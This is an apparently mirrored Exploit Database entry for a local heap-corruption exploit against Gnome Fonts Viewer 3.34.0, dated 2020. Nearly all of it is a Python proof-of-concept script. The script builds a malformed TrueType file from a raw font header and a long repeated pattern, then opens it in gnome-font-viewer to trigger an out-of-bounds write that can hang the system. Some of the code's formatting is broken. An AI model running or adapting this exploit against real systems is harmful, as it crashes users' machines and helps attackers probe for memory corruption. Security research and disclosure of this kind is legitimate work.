Gnome Fonts Viewer 3.34.0 – Heap Corruption

• Exploit Database
• 41 阅读

• 作者： Cody Winkler
  日期： 2020-09-11
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/48803/

• #!/usr/bin/env python3
  # Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption
  # Date: 2020-09-10
  # Exploit Author: Cody Winkler
  # Vendor Homepage: gnome.org
  # Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html
  # Version: 3.34.0
  # Tested On: Ubuntu 20.04.1 LTS
  #
  # Note: May take a few tries. Too many consecutive runs can freeze OS.
  # This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.
  
  from os import system
  
  this_pattern = "BEEF"*21125 # needs to be filled to len ~84500
  
  # TTF file header (probably has some junk data in it) taken from MesloLGS
  NF Regular.ttf
  
  ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54"
  "\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45"
  "\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f"
  "\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55"
  "\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f"
  "\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45"
  "\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61"
  "\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74"
  "\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67"
  "\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73"
  "\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79"
  "\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61"
  "\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65"
  "\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74"
  "\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63"
  "\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78"
  "\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d"
  "\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73"
  "\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65"
  "\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00"
  "\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08"
  "\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14"
  "\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a")
  
  print('[+] Generating crash.ttf with DEADDEAD')
  
  with open("./crash.ttf", 'w') as f:
  f.write(ttf_header)
  f.write(this_pattern)
  f.close()
  print('[+] Done')
  
  print('[+] Triggering out-of-bounds write in gnome-font-viewer')
  system("/usr/bin/gnome-font-viewer ./crash.ttf")